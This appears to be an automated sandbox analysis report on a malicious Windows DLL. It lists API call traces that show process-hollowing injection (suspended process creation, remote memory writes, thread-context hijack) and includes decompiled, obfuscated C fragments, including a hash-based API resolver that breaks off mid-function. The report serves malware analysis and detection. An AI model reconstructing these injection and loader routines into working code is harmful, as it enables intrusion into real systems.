    0x6e4cde7f
    0x6e4cde85
    0x6e4cde8f
    0x6e4cde95
    0x6e4cde98
    0x6e4cde9c
    0x6e4cdea4
    0x6e4cdea8
    0x6e4cdeb0
    0x6e4cdeb5
    0x6e4cdeba
    0x6e4cdec2
    0x6e4cdec9
    0x6e4cdf7b
    0x6e4cdf7b
    0x6e4cdf92
    0x6e4cdf9e
    0x6e4cdfa9
    0x6e4cdfae
    0x6e4cdfb3
    0x6e4cdfb8
    0x6e4cdfcd
    0x6e4cdfd3
    0x6e4cdfdb
    0x6e4cdfea
    0x6e4cdff9
    0x6e4cdffe
    0x6e4ce003
    0x6e4ce00c
    0x6e4ce00f
    0x6e4ce011
    0x6e4ce019
    0x6e4ce020
    0x6e4ce026
    0x6e4ce02d
    0x6e4ce033
    0x6e4ce03d
    0x6e4ce051
    0x6e4ce059
    0x6e4ce073
    0x6e4ce085
    0x6e4ce0a1
    0x6e4ce0aa
    0x6e4ce0bc
    0x6e4ce0d3
    0x6e4ce0dd
    0x6e4ce0e2
    0x6e4ce0e5
    0x6e4ce0f6
    0x6e4ce0fb
    0x6e4ce106
    0x6e4ce10f
    0x6e4ce118
    0x6e4ce120
    0x6e4ce131
    0x6e4ce13d
    0x6e4ce13f
    0x6e4ce151
    0x6e4ce15c
    0x6e4ce164
    0x6e4ce181
    0x6e4ce186
    0x6e4ce18b
    0x6e4ce195
    0x6e4ce19b
    0x6e4ce1a0
    0x6e4ce1b2
    0x6e4ce1b7
    0x6e4ce1c4
    0x6e4ce1cb
    0x6e4ce1cb
    0x6e4ce1d5
    0x6e4ce1da
    0x6e4ce1ec
    0x6e4ce1f1
    0x6e4ce1f5
    0x6e4ce228
    0x6e4ce22d
    0x6e4ce230
    0x6e4ce1f7
    0x6e4ce207
    0x6e4ce20c
    0x6e4ce20f
    0x6e4ce211
    0x6e4ce213
    0x6e4ce215
    0x6e4ce218
    0x6e4ce21a
    0x6e4ce21c
    0x6e4ce21c
    0x6e4ce233
    0x6e4ce233
    0x6e4ce1f1
    0x6e4ce18b
    0x6e4ce0fb
    0x6e4ce011
    0x00000000
    0x6e4cdecf
    0x6e4cdecf
    0x6e4cded1
    0x6e4cded4
    0x6e4cdedd
    0x6e4cdee0
    0x6e4cdee0
    0x6e4cdeec
    0x6e4cdf01
    0x6e4cdf09
    0x6e4cdf14
    0x6e4cdf26
    0x6e4cdf34
    0x6e4cdf3d
    0x6e4cdf53
    0x6e4cdf56
    0x6e4cdf62
    0x6e4cdf67
    0x6e4cdf6c
    0x6e4cdf72
    0x00000000
    0x6e4cdee0

    APIs
    • VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000004), ref: 6E4CDE54
    • WriteProcessMemory.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6E4CDFA9
    • VirtualAllocEx.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 6E4CE00C
    • WriteProcessMemory.KERNELBASE(?,?,000000BE,00000042,00000000), ref: 6E4CE0F6
    • GetThreadContext.KERNELBASE(?,?), ref: 6E4CE13D
    • VirtualProtectEx.KERNELBASE(?,?,00000000,00000000,00000000), ref: 6E4CE17B
    • SetThreadContext.KERNELBASE(?,00010001), ref: 6E4CE1C4
    • VirtualProtectEx.KERNELBASE(?,?,00000000,00000040,00000000), ref: 6E4CE1EC
    • ResumeThread.KERNELBASE(?), ref: 6E4CE233
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 6E4CDE20
      • Part of subcall function 6E4CF5C0: LoadLibraryA.KERNEL32(?), ref: 6E4CF82C
    • ExitProcess.KERNEL32(00000000), ref: 6E4CE24F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ProcessVirtual$Thread$AllocContextMemoryProtectWrite$CreateExitLibraryLoadResume
    • String ID: D
    • API String ID: 1100182367-2746444292
    • Opcode ID: 0aa73867ac6de16adf09671ee0da585b14596ba1b20eb981206d224fcbeb767c
    • Instruction ID: 024144ac7994e44b2d8fe27424d7580089530518ef701a2d375139ad3a456312
    • Opcode Fuzzy Hash: 0aa73867ac6de16adf09671ee0da585b14596ba1b20eb981206d224fcbeb767c
    • Instruction Fuzzy Hash: BAD1F8B5D402156AEB109BF4AC42FFE767CAF19609F14086AF909B7281FB715A0487F3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E50A2F7, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00000913,00003000,00000040,00000913,6E509D50), ref: 6E50A3B4
    • VirtualAlloc.KERNEL32(00000000,000001D9,00003000,00000040,6E509DB0), ref: 6E50A3EB
    • VirtualAlloc.KERNEL32(00000000,00021FD4,00003000,00000040), ref: 6E50A44B
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E50A481
    • VirtualProtect.KERNEL32(6E4B0000,00000000,00000004,6E50A2D6), ref: 6E50A586
    • VirtualProtect.KERNEL32(6E4B0000,00001000,00000004,6E50A2D6), ref: 6E50A5AD
    • VirtualProtect.KERNEL32(00000000,?,00000002,6E50A2D6), ref: 6E50A67A
    • VirtualProtect.KERNEL32(00000000,?,00000002,6E50A2D6,?), ref: 6E50A6D0
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E50A6EC
    Memory Dump Source
    • Source File: 00000000.00000002.302129642.000000006E509000.00000040.00020000.sdmp, Offset: 6E509000, based on PE: false
    Similarity
    • API ID: Virtual$Protect$Alloc$Free
    • String ID:
    • API String ID: 2574235972-0
    • Opcode ID: c06b1477aa61c87ccc77a10075d73aabdf839f5567d94571a5fcb8cd98cfae2b
    • Instruction ID: c834e78a3b1939026c0aee10a3e42989f381f13a61ee239955eec77000e7e952
    • Opcode Fuzzy Hash: c06b1477aa61c87ccc77a10075d73aabdf839f5567d94571a5fcb8cd98cfae2b
    • Instruction Fuzzy Hash: D3D113736002029FEF168F94CC80B6577E5BF88310B0A8594FD8DAF25ED771AE11AB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4B2B90, Relevance: .1, Instructions: 125COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4B2B90(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v30;
				signed int _v36;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t74;
				signed int _t78;
				signed int _t79;
				signed int _t84;
				signed int _t88;
				intOrPtr _t90;
				signed int _t99;
				intOrPtr _t101;
				signed int _t102;
				signed int _t108;
				signed int _t111;
				signed int _t114;
				signed int _t115;
				signed int _t118;
				signed int _t120;
				signed int _t121;
				signed int _t124;
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t135;
				signed int _t138;
				signed int _t139;
				void* _t141;

				_v12 =  *0x6e4d50b0 | 0x00000001;
				E6E4B8BF0(); // executed
				_v8 = _v12 * 0x372;
				E6E4CF840();
				_t69 = _v8;
				_t118 = _v12 & _t69;
				_t70 = _t69 * _t118;
				_v8 = _t70;
				_v12 = _t70 * _t118;
				E6E4B3420();
				_t73 = _v12;
				_t120 = _v8 * _t73;
				_t74 = _t73 & _t120;
				_t121 = _t120 * _t74;
				_v8 = _t121;
				_v12 = _t121 * _t74;
				E6E4CFC90(E6E4B6A40());
				_t78 = _v12 ^ _v8;
				_t124 = _t78 & 0x00008000;
				_t79 = _t78 ^ _t124;
				_v8 = _t79;
				_v12 = _t79 * _t124;
				E6E4B80C0();
				_t127 = _v8 * _v12 | _v12;
				_t84 = _t127 ^ 0x00000388;
				_v8 = _t84;
				_v12 = _t84 & _t127;
				E6E4CFC90(_t84 & _t127);
				E6E4B5190();
				_t88 = _v12;
				_t129 = _v8 ^ _t88;
				_v8 = _t129;
				_t138 = _t129 & _t88;
				_v16 = _t138;
				_t139 = _t138 ^ _t88;
				_v12 = _t139;
				_v20 = _t139 ^ _t129;
				E6E4B5260();
				_t90 =  *0x6e4d50a8; // 0xc75f8678
				if(_t90 <= _v8 &&  *0x6e4d50b0 <= _v16) {
					_t111 = _v20;
					_t135 = (_v12 + _t111) * _v16;
					_v16 = _t135;
					_v8 = _t135 - _t111;
					E6E4CF840();
					_t114 = _v8 - _v12;
					_v16 = _t114;
					_t115 = _t114 + _v20;
					_v8 = _t115;
					_v20 = _t115 | 0x00000040;
				}
				if( *0x6e4d50a4 == 0xfb8a8f28) {
					_t101 =  *0x6e4d5000; // 0x1
					if(_t101 <= _v16) {
						_t102 = _v20;
						_t131 = _v16 + _t102;
						_v8 = _t131;
						_v16 = _t131 ^ _t102;
						E6E4B9890(_v12, _t102);
						_t141 = _t141 + 8;
						_v8 = 0x4000;
						_v20 = (0x00004000 | _v16) - _v12;
						E6E4B2D30();
						_t108 = _v20 ^ _v16;
						_v24 = _t108;
						_v16 = _t108 ^ _v12;
					}
				}
				_v20 = 0x320;
				_v36 = 0x320;
				_v24 = 0x320;
				_v28 = (((0x00000320 + _v16) * _v24 ^ _v8) + 0xfffffe8c) * 0xdc;
				E6E4CF840();
				_t99 = _v28 ^ _v20;
				_v30 = _t99;
				return _t99;
			}






































    0x6e4b2ba0
    0x6e4b2ba3
    0x6e4b2baf
    0x6e4b2bb2
    0x6e4b2bb7
    0x6e4b2bbd
    0x6e4b2bbf
    0x6e4b2bc2
    0x6e4b2bc8
    0x6e4b2bcb
    0x6e4b2bd0
    0x6e4b2bd6
    0x6e4b2bd9
    0x6e4b2bdb
    0x6e4b2bde
    0x6e4b2be4
    0x6e4b2bec
    0x6e4b2bf4
    0x6e4b2bf9
    0x6e4b2bff
    0x6e4b2c01
    0x6e4b2c07
    0x6e4b2c0a
    0x6e4b2c18
    0x6e4b2c1c
    0x6e4b2c21
    0x6e4b2c26
    0x6e4b2c29
    0x6e4b2c2e
    0x6e4b2c33
    0x6e4b2c39
    0x6e4b2c3b
    0x6e4b2c40
    0x6e4b2c42
    0x6e4b2c45
    0x6e4b2c47
    0x6e4b2c4c
    0x6e4b2c4f
    0x6e4b2c54
    0x6e4b2c5c
    0x6e4b2c6a
    0x6e4b2c72
    0x6e4b2c76
    0x6e4b2c7b
    0x6e4b2c7e
    0x6e4b2c86
    0x6e4b2c89
    0x6e4b2c8c
    0x6e4b2c8f
    0x6e4b2c95
    0x6e4b2c95
    0x6e4b2ca2
    0x6e4b2ca4
    0x6e4b2cac
    0x6e4b2cae
    0x6e4b2cb4
    0x6e4b2cb6
    0x6e4b2cbb
    0x6e4b2cc2
    0x6e4b2cc7
    0x6e4b2cd2
    0x6e4b2cd8
    0x6e4b2cdb
    0x6e4b2ce3
    0x6e4b2ce6
    0x6e4b2cec
    0x6e4b2cec
    0x6e4b2cac
    0x6e4b2cf7
    0x6e4b2d01
    0x6e4b2d09
    0x6e4b2d12
    0x6e4b2d15
    0x6e4b2d1d
    0x6e4b2d20
    0x6e4b2d29

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CursorEvent$ClipCloseCreateErrorHandleLast
    • String ID:
    • API String ID: 3728218925-0
    • Opcode ID: 8f6d59dd264636154e12579a9c24da10e9747d136a2e1f8c59fff41c8338d0cd
    • Instruction ID: 5cea28015187daaa219bb04e95ed3ba3769c0b78f10ca3a9477adda1ee0e7cab
    • Opcode Fuzzy Hash: 8f6d59dd264636154e12579a9c24da10e9747d136a2e1f8c59fff41c8338d0cd
    • Instruction Fuzzy Hash: 14518375E11209EFCF08DFF4D9959AEBBF9EB49204F1088AAD415EB340E7389B409B54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4E0750, Relevance: 9.5, APIs: 2, Strings: 3, Instructions: 726sleepCOMMON
    Download Yara Rule
    APIs
    • GetCurrentDirectoryA.KERNEL32(000007C7,6E5096C0), ref: 6E4E0CA0
    • Sleep.KERNELBASE(00000088,?,?,?,?,?,?,?,?,?,?,-00000002,?,00000000), ref: 6E4E0FC7
    Strings
    • ", xrefs: 6E4E0C74
    • required="false" variableLength="false">SwitchParameter</command:parameterValue><dev:type> <maml:name>SwitchParameter</maml:name> <maml:uri /> </dev:type> <dev:defaultValue /> </command:parameter></command:parameters>, xrefs: 6E4E0DD8
    • o, xrefs: 6E4E09B1
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: CurrentDirectorySleep
    • String ID: "$o$required="false" variableLength="false">SwitchParameter</command:parameterValue><dev:type> <maml:name>SwitchParameter</maml:name> <maml:uri /> </dev:type> <dev:defaultValue /> </command:parameter></command:parameters>
    • API String ID: 16921501-3226252298
    • Opcode ID: 3c6ca5547faf39937576c085157b54561b77f028ec3e0c8892dbdbc94d4fbd4e
    • Instruction ID: 45d618f917e20d9cdf451034cea9dac0b5cc8032db9e013d3b05400fe47f9856
    • Opcode Fuzzy Hash: 3c6ca5547faf39937576c085157b54561b77f028ec3e0c8892dbdbc94d4fbd4e
    • Instruction Fuzzy Hash: 8A5212B3A04A118FDB08CF78C5B1E517BE5AB86305F02412FE5948B791EF749A09CF96
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4CFC90, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4CFC90(void* __eax) {
				char _v12;
				void* _t5;

				_t5 = CreateEventW(0, 1, 0, E6E4BF180(0x6e4d3ac4,  &_v12));
				if(_t5 != 0) {
					SetEvent(_t5);
					_t5 = CloseHandle(_t5); // executed
				}
				SetLastError(0);
				return _t5;
			}





    0x6e4cfcad
    0x6e4cfcb5
    0x6e4cfcba
    0x6e4cfcc1
    0x6e4cfcc1
    0x6e4cfcc9
    0x6e4cfcd4

    APIs
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,6E4B8C29,?,?,?,?,6E4B2BA8), ref: 6E4CFCAD
    • SetEvent.KERNEL32(00000000,?,6E4B8C29,?,?,?,?,6E4B2BA8,?,?,?,?,?,?,?,6E4BA1E6), ref: 6E4CFCBA
    • CloseHandle.KERNELBASE(00000000,?,6E4B8C29,?,?,?,?,6E4B2BA8,?,?,?,?,?,?,?,6E4BA1E6), ref: 6E4CFCC1
    • SetLastError.KERNEL32(00000000,?,6E4B8C29,?,?,?,?,6E4B2BA8,?,?,?,?,?,?,?,6E4BA1E6), ref: 6E4CFCC9
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Event$CloseCreateErrorHandleLast
    • String ID:
    • API String ID: 2055590504-0
    • Opcode ID: 3f1697b5095051b370bdc02de7af401dd2731f65bad194c66662675fd544188c
    • Instruction ID: 1b5a70e365496ab9456c9234868f36e806fa7021cdf0c6d9535a9e2f4539ac96
    • Opcode Fuzzy Hash: 3f1697b5095051b370bdc02de7af401dd2731f65bad194c66662675fd544188c
    • Instruction Fuzzy Hash: 88E08676A416487BEF1277F0BC0DFEB7A6CDF05B96F040022FA09D9280EA61951487B6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4B2D30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4B2D30() {
				char _v8;

				GetConsoleCP();
				_t1 =  &_v8; // 0x6e4b3565
				GetFileAttributesW(E6E4BF180(0x6e4d3ac4, _t1));
				return GetCapture();
			}




    0x6e4b2d34
    0x6e4b2d3a
    0x6e4b2d4c
    0x6e4b2d56

    APIs
    • GetConsoleCP.KERNELBASE(00000000,?,6E4B3565,?,?,?,?,?,?,?,?,?,?,6E4B2BD0), ref: 6E4B2D34
    • GetFileAttributesW.KERNEL32(00000000,?,6E4B3565,?,?,?,?,?,?,?,?,?,?,6E4B2BD0), ref: 6E4B2D4C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AttributesConsoleFile
    • String ID: e5Kn
    • API String ID: 1533235433-3063621063
    • Opcode ID: 28c4c079c4d312eaafbaab30abe461ed925c9a2f4a692a56e53eeb05b95b9ffe
    • Instruction ID: bab7476ad30b9628c2f2246c3908268bd941fab54b849f4110239952ef134f36
    • Opcode Fuzzy Hash: 28c4c079c4d312eaafbaab30abe461ed925c9a2f4a692a56e53eeb05b95b9ffe
    • Instruction Fuzzy Hash: 2AD012B5C00A0DFBCE027BF4FD0DE9AB76C990251AB040471E90591205E635A61886B6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4E6D80, Relevance: 3.2, APIs: 2, Instructions: 181COMMON
    Download Yara Rule
    APIs
    • FindFirstChangeNotificationA.KERNELBASE(6E503E70,00000001,00000004,6E5085E0), ref: 6E4E6DCD
    • FindFirstChangeNotificationA.KERNELBASE(6E503E44,00000001,00000020,?,6E503E4C,00000000,00000000), ref: 6E4E6FC2
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: ChangeFindFirstNotification
    • String ID:
    • API String ID: 1065410024-0
    • Opcode ID: d37a56262e01407b681d7b8a78ece702a57efc0fc2a14c95047f8f9ad3dbce84
    • Instruction ID: e445d41077b7d286dc4d944911754035359ce830a10883de5fb76a4323f5c2c9
    • Opcode Fuzzy Hash: d37a56262e01407b681d7b8a78ece702a57efc0fc2a14c95047f8f9ad3dbce84
    • Instruction Fuzzy Hash: A5710372904A50CBDF04CFB8C9B5FE97BE4EB1A314F02802EF64997781EA745609CB56
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4E6F3C, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
    Download Yara Rule
    APIs
    • FindFirstChangeNotificationA.KERNELBASE(6E503E44,00000001,00000020,?,6E503E4C,00000000,00000000), ref: 6E4E6FC2
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: ChangeFindFirstNotification
    • String ID:
    • API String ID: 1065410024-0
    • Opcode ID: 0617f22dfff94173a352b6c2c7c304ac7c3c6f75fe69ecfe6dc98d2a114f32cb
    • Instruction ID: 93c2d9a4d1f689d7aa4216014cce435c04a7277f83b2e789fa5dcdbe20ce191b
    • Opcode Fuzzy Hash: 0617f22dfff94173a352b6c2c7c304ac7c3c6f75fe69ecfe6dc98d2a114f32cb
    • Instruction Fuzzy Hash: D531E273904E008BDF48CFB8C5B4EA977A1EB56315F02802EF68943781EA351649CB56
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4E6F5B, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
    Download Yara Rule
    APIs
    • FindFirstChangeNotificationA.KERNELBASE(6E503E44,00000001,00000020,?,6E503E4C,00000000,00000000), ref: 6E4E6FC2
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: ChangeFindFirstNotification
    • String ID:
    • API String ID: 1065410024-0
    • Opcode ID: 8f80be927b503291443354e56e0f741bfbfbcd7a40bd9d56648b641ba655c3f6
    • Instruction ID: 32dbc44fc5c4c2c59cb24c301aebf41deef0b5f2eb783bf182b1b6dd09ca35bd
    • Opcode Fuzzy Hash: 8f80be927b503291443354e56e0f741bfbfbcd7a40bd9d56648b641ba655c3f6
    • Instruction Fuzzy Hash: CD31E373A04E008BDF48CFB8C5B5EA977A1EB56315F02802EF68943781EE355649CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4CD430, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4CD430(void* __eflags, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;

				_t8 = _a4;
				if((E6E4B4C00(_t8, 0) & 0x00000001) == 0) {
					E6E4CF5C0(0, E6E4B8AE0(0x46a76f));
					_t6 = RtlAllocateHeap( *0x6e4d7a70, 0, _t8 + 4); // executed
					return _t6;
				}
				return 0;
			}





    0x6e4cd434
    0x6e4cd444
    0x6e4cd45d
    0x6e4cd46e
    0x00000000
    0x6e4cd46e
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,00000000,?), ref: 6E4CD46E
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: ffea83125470c542ad174689753ddc126d6f66f3df633b6c9700c6f648fc17b7
    • Instruction ID: c14c8ae965d5c8a220e45535c3ea77b12b9e00b9c265922c3b874d3007cc102d
    • Opcode Fuzzy Hash: ffea83125470c542ad174689753ddc126d6f66f3df633b6c9700c6f648fc17b7
    • Instruction Fuzzy Hash: 72E086AAD8511036D94022F27C02FD6355C9B16AAEF150823FE0D72281F652751145F7
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4EB77E, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
    Download Yara Rule
    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6E4E8D36,?), ref: 6E4EB793
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: CreateHeap
    • String ID:
    • API String ID: 10892065-0
    • Opcode ID: 4618477801a4207e20c601e8ed89a47c30499534566c41abaf66f597c55e3817
    • Instruction ID: 71074f18382ba59c76f494f2d0b8e23cf71edf40df02b5a0f2bc637350d06a33
    • Opcode Fuzzy Hash: 4618477801a4207e20c601e8ed89a47c30499534566c41abaf66f597c55e3817
    • Instruction Fuzzy Hash: 22D09736550B049FDF006FB06C09BA23BDCC7C4391F158437BA0DCAA40F930C480C100
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4EB1D6, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
    Download Yara Rule
    APIs
    • __encode_pointer.LIBCMT ref: 6E4EB1D8
      • Part of subcall function 6E4EB164: RtlEncodePointer.NTDLL(00000000,?,6E4EB1DD,00000000,6E4F1286,6E51A5F8,00000000,00000314,?,6E4EB0EF,6E51A5F8,6E504440,00012010), ref: 6E4EB1CB
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: EncodePointer__encode_pointer
    • String ID:
    • API String ID: 4150071819-0
    • Opcode ID: 88dfec34f3c22205ce83f1d5bb820faabfdb8689d940ef1222c4eb8b28383419
    • Instruction ID: 36bc6432ad6c58cc922301635535c7ea8b7d7d87e76c0937b06ee589d7dc36b7
    • Opcode Fuzzy Hash: 88dfec34f3c22205ce83f1d5bb820faabfdb8689d940ef1222c4eb8b28383419
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 6E4E8B05, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
    Download Yara Rule
    APIs
    • IsDebuggerPresent.KERNEL32 ref: 6E4EE867
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E4EE87C
    • UnhandledExceptionFilter.KERNEL32(6E5045E0), ref: 6E4EE887
    • GetCurrentProcess.KERNEL32(C0000409), ref: 6E4EE8A3
    • TerminateProcess.KERNEL32(00000000), ref: 6E4EE8AA
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
    • String ID:
    • API String ID: 2579439406-0
    • Opcode ID: 34a4eb845d8c23ad7d3e15dcd17b6dd08de02e93e9052ba23093b2924b54c711
    • Instruction ID: 042f7d2c76da5fbaa7f660e0e809d8a5587c0d08d57468cbc1f322d44e24039b
    • Opcode Fuzzy Hash: 34a4eb845d8c23ad7d3e15dcd17b6dd08de02e93e9052ba23093b2924b54c711
    • Instruction Fuzzy Hash: DE21FCB8900B44DFCF02DF65D646A843BF5BB4A355F12841AF60987B42EF785988CF85
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4CF870, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 250libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E6E4CF870(signed int _a4, intOrPtr _a8) {
				CHAR* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v136;
				void* _t72;
				void* _t77;
				intOrPtr* _t80;
				void* _t86;
				void* _t90;
				void* _t91;
				void* _t94;
				signed int _t98;
				void* _t100;
				signed char _t105;
				signed int _t110;
				void* _t111;
				void* _t113;
				void* _t114;
				char _t117;
				signed int _t118;
				signed int _t125;
				void* _t126;
				intOrPtr _t129;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr* _t137;
				intOrPtr _t139;
				void* _t140;
				_Unknown_base(*)()* _t147;
				char* _t148;
				intOrPtr _t149;
				CHAR* _t152;
				signed char* _t153;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t164;
				void* _t166;
				void* _t167;
				void* _t172;
				void* _t177;

				_t118 = _a4;
				_t147 = 0;
				_t180 = _t118;
				if(_t118 != 0) {
					_t72 = E6E4CB420(_t180, _t118);
					_t158 = _t157 + 4;
					_t134 =  *((intOrPtr*)(_t72 + 0x60));
					_t181 =  *((intOrPtr*)(_t134 + _t118 + 0x18));
					if( *((intOrPtr*)(_t134 + _t118 + 0x18)) != 0) {
						_v32 =  *((intOrPtr*)(_t72 + 0x64));
						_t135 = _t134 + _t118;
						_t148 = E6E4B2640(0, E6E4B6CC0(_t181, E6E4B2640(0,  *((intOrPtr*)(_t135 + 0x24))),  ~_t118));
						_v28 = _t135;
						_t77 = E6E4B2640(0,  *((intOrPtr*)(_t135 + 0x20)));
						_t80 = E6E4B2640(0, E6E4B2640(0, _t118) + _t77);
						_t164 = _t158 + 0x30;
						_t137 = _t80;
						_t129 = 0;
						_t119 =  &_v136;
						0;
						0;
						0;
						do {
							_v36 = _t129;
							_v20 = _t148;
							_t149 =  *_t137;
							E6E4B6CC0(0, _t149, _a4);
							E6E4BAF10(_t119, 0x64);
							_t166 = _t164 + 0x10;
							_t85 =  *((intOrPtr*)(_t149 + _a4));
							if( *((intOrPtr*)(_t149 + _a4)) != 0) {
								_t155 = _t149 + _a4;
								_t126 = 0;
								do {
									_t117 = E6E4B4AE0(0, _t85);
									_t166 = _t166 + 4;
									 *((char*)(_t156 + _t126 - 0x84)) = _t117;
									_t85 =  *(_t155 + _t126 + 1) & 0x000000ff;
									_t126 = _t126 + 1;
								} while (_t85 != 0);
							}
							_push(0xffffffff);
							_t119 =  &_v136;
							_t86 = E6E4B8E60( &_v136);
							_t167 = _t166 + 8;
							if(_t86 == _a8) {
								_t90 = E6E4B6CC0(__eflags,  *((intOrPtr*)(_v28 + 0x1c)), _a4);
								_t91 = E6E4B8AE0(0xab29d786);
								_t147 = E6E4B8AE0(0xab29d786) +  *((intOrPtr*)(_t90 + ( *_v20 & 0x0000ffff) * 4)) - _t91 + _a4;
								_t139 = _v28;
								E6E4B6CC0(__eflags,  *((intOrPtr*)(_t90 + ( *_v20 & 0x0000ffff) * 4)), _a4);
								_t94 = E6E4B8AE0(0xea92e690);
								_t172 = _t167 + 0x1c;
								__eflags = _t147 - _t139;
								if(_t147 > _t139) {
									_t140 = _t139 - _t94;
									_t38 = _v32 - 0x1d43e3e4; // -490988516
